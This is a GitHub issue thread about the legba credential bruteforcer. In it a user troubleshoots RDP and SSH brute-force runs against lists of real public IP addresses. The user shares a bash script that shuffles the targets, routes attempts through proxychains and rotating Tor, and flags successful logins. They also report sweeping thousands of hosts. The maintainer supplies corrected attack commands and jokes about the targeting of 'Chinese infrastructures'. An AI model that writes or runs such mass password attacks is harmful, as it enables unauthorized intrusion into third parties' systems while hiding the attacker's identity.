evilsocket / legba

A multiprotocol credentials bruteforcer / password sprayer and enumerator. 🥷

invalid socket address syntax #15

Closed myusernameis69 closed 11 months ago

myusernameis69 commented 11 months ago

Hey!

Trying to run a simple RDP brute and even if I have only 1 IP in my IP file, it's always returning a syntax error!

root@debian:~# legba -t @/root/rdp_targets.txt --username @/root/admin_userlist.txt --password @/root/passwords.txt --rdp-auto-logon --output /root/LEGBA_GOOD.txt --output-format text --timeout 30000 --retries 5 --retry-time 1000 --concurrency 5 --jitter-min 500 --jitter-max 500 rdp

[INFO ] targeting @/root/rdp_targets.txt
Error: "invalid socket address syntax"

Content of rdp_targets.txt is: ip ip ip ip

What is the problem causing this? Is there any other format for the IPs in the file? File contains IPv4 addresses, not 6.

Thanks!

evilsocket commented 11 months ago

-t/--target does not support multiple targets from file, you'll have to use -M/--multiple which is a feature I just pushed on master and not tagged in a release yet

evilsocket commented 11 months ago

PS: the first argument must be the plugin name btw

myusernameis69 commented 11 months ago

Any ETA on releasing it? Btw, does it support targets file for ssh?

Thank you for your quick reply, Kindly appreciate it.

evilsocket commented 11 months ago

@myusernameis69 not really but it shouldn't take long (less than a month probably), just need some time to polish it a bit

evilsocket commented 11 months ago

and yes multi mode supports all plugins

myusernameis69 commented 11 months ago

Hah, perfect!

Well, in that case, did a bash script to work with it, will share it with the world to use a targets list, hope people find it useful.

This script is designed to run Legba with randomized targets using proxychains and highlight successful logins. It is designed to offer targets file support. Make sure to configure proxychains properly, test first by removing proxychains from the command. (I have a multitor setup running with HUP signal / rotating system / 10 instances to always provide fresh and fast proxies from tor)

#!/bin/bash

# ANSI color codes for coloring output
RED='\033[0;31m'    # Color for failed connection attempts
GREEN='\033[0;32m'  # Color for successful connection attempts and successful logins
NC='\033[0m'        # No Color - reset to default text color

# Paths to the files (Replace with actual paths or provide these as command line arguments)
TARGETS_FILE="path/to/your/targets_list.txt"  # Example: "/home/user/targets.txt"
USERNAMES_FILE="path/to/your/usernames_list.txt"  # Example: "/home/user/usernames.txt"
PASSWORDS_FILE="path/to/your/passwords_list.txt"  # Example: "/home/user/passwords.txt"
OUTPUT_FILE="path/to/your/output_log.txt"  # File where successful connection attempts will be logged
ERROR_FILE="path/to/your/error_log.txt"  # File for logging connection errors

# Configuration for Legba
TIMEOUT=30000  # Example: 15000 for 15 seconds
RETRIES=5      # Example: 3 for three retries
RETRY_TIME=1000  # Example: 5000 for 5 seconds between retries
CONCURRENCY=20   # Example: 50 for fifty concurrent connection attempts
JITTER_MIN=100   # Example: 200 for a minimum of 200 milliseconds random delay
JITTER_MAX=1000  # Example: 3000 for a maximum of 3000 milliseconds random delay

# Read targets into an array and shuffle it
readarray -t TARGETS < "$TARGETS_FILE"
RANDOMIZED_TARGETS=($(shuf -e "${TARGETS[@]}"))

# Function to process each line of output from Legba
process_output() {
    while read -r line; do
        if [[ "$line" == *"result found"* ]]; then
            echo -e "${GREEN}$line${NC}"
        else
            echo "$line"
        fi
    done
}

# Iterate over the randomized target list
for target in "${RANDOMIZED_TARGETS[@]}"
do
    echo -e "Attempting to connect to ${GREEN}$target${NC}"
    # Run Legba for the current target with proxychains
    proxychains legba rdp -t "$target" --username @"$USERNAMES_FILE" --password @"$PASSWORDS_FILE" --rdp-auto-logon --output "$OUTPUT_FILE" --output-format text --timeout $TIMEOUT --retries $RETRIES --retry-time $RETRY_TIME --concurrency $CONCURRENCY --jitter-min $JITTER_MIN --jitter-max $JITTER_MAX 2>&1 | process_output | tee -a "$ERROR_FILE"

    # Check if Legba succeeded or failed by examining the exit status
    if [ $? -ne 0 ]; then
        echo -e "${RED}Failed to connect to:${NC} $target" | tee -a "$ERROR_FILE"
    fi
done

echo "Script completed."

evilsocket commented 11 months ago

@myusernameis69 released as 0.4.0, check this entry of the wiki https://github.com/evilsocket/legba/wiki/Usage-and-Main-Options#selecting-one-or-more-targets

myusernameis69 commented 11 months ago

Thanks a lot! Seems like I skipped reading the entire wiki, haha :D

Now I've got this new problem which I personally consider a bug, I might be dumb, but check this out:

When getting

[ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known

Even if I started checking 10 IPs, it skips the rest, returning that 1 address is unsolvable or invalid (it is valid, but probably can't solve a DNS lookup). It should continue checking the rest of the IPs till all 10 are finished, even if error, right?

[INFO ] targeting 8.217.150.222,8.218.159.241,8.219.67.107,8.210.237.216,8.220.23.160,8.219.237.80,8.212.154.65,8.129.13.149,8.134.156.232,8.245.7.184
[INFO ] username -> string 'root'
[INFO ] password -> string '@/root/thc-hydra/passwords.txt'

[INFO ] tasks=100 mem=19.1 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known
[INFO ] runtime 27.115741663s
Already checked: 8.210.22.202
Already checked: 8.136.123.210
Already checked: 8.218.243.198
Already checked: 8.134.201.206
Already checked: 8.212.145.201
ProxyChains-3.1 (http://proxychains.sf.net)
legba v0.3.0

[INFO ] targeting 8.36.250.129,8.134.91.75,8.210.216.118,8.217.31.209,8.213.197.139,8.218.97.11,8.218.243.152,8.208.11.50,8.213.21.60,8.217.236.57
[INFO ] username -> string 'root'
[INFO ] password -> string '@/root/thc-hydra/passwords.txt'

[INFO ] tasks=100 mem=19.7 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
[INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s

evilsocket commented 11 months ago

what command line are you using? i see you're still passing "@/root/thc-hydra/passwords.txt" which, as I already said, it's wrong .. remove the @ ....

evilsocket commented 11 months ago

From what I see you should be using:

legba ssh -T "8.217.150.222,8.218.159.241,8.219.67.107,8.210.237.216,8.220.23.160,8.219.237.80,8.212.154.65,8.129.13.149,8.134.156.232,8.245.7.184" --username root --password /root/thc-hydra/passwords.txt

myusernameis69 commented 11 months ago

proxychains legba ssh --target "8.222.203.176,8.222.205.200,8.222.206.230,8.222.207.218,8.222.208.36,8.222.208.182,8.222.210.120,8.222.212.254,8.222.214.206,8.222.214.242" --username "root" --password "@/root/thc-hydra/passwords.txt" --output "/root/thc-hydra/LEGBA_GOOD_SSH.txt" --output-format "text" --timeout "30000" --retries "2" --retry-time "10000" --concurrency "100" --jitter-min "500" --jitter-max "15000"

evilsocket commented 11 months ago

seems fine apart from the @ ... i can confirm that even if one of the addresses is not reachable, it does continue with the other ones until completed

evilsocket commented 11 months ago

yep can confirm it behaves as expected:

[Screenshot, 2023-11-05 23:37:49]

evilsocket commented 11 months ago

(someone's targeting Chinese infrastructures uh? :D)

myusernameis69 commented 11 months ago

Hahahaha, it's just for "demonstration" purposes :P

Sooo, yes, the problem was coming from @ lol :D, now if that error happens, it just keeps checking the other IPs. Amazing tool man :) wish someday I get to your level, love the nickname too.

evilsocket commented 11 months ago

glad we got it working! have fun with your "demonstration" ;)

myusernameis69 commented 11 months ago

Thanks a lot :D

Is there a limit to how many IPs can be sent as comma separated?

evilsocket commented 11 months ago

@myusernameis69 nope, no limit ... but if you have many, I suggest you use a file ( -T "@file-with-ips.txt" .. in this case @ is valid ) ... or an ip range expression ... as the wiki says:

The --target/-T argument supports one or multiple targets expressed as one of the following, or a comma separated list of the following:

myusernameis69 commented 11 months ago

It seems I just can't get it working with @, and with IPs separated by commas I'm now experiencing problems as well.

Can you please write 2 full commands for both as an example? Getting totally lost :(

evilsocket commented 11 months ago

legba ssh -T @filename-with-ips.txt --username root --password /root/thc-hydra/passwords.txt

myusernameis69 commented 10 months ago

For the past 3 days I've still been figuring out how to increase speed, tried playing with and changing values for all options but none helped. Any suggestion on how to make it work faster? Did only 6k IPs in 28 hours.

myusernameis69 commented 10 months ago

Forgot to mention:

[INFO ] tasks=500 mem=20.8 MiB done=6180 (0.06%) errors=6180 speed=0 reqs/s

From 6180 checked, 6180 error, that's not right, is it?

evilsocket commented 10 months ago

you are using too many concurrent requests, i'd suggest you leave the default value and see how it goes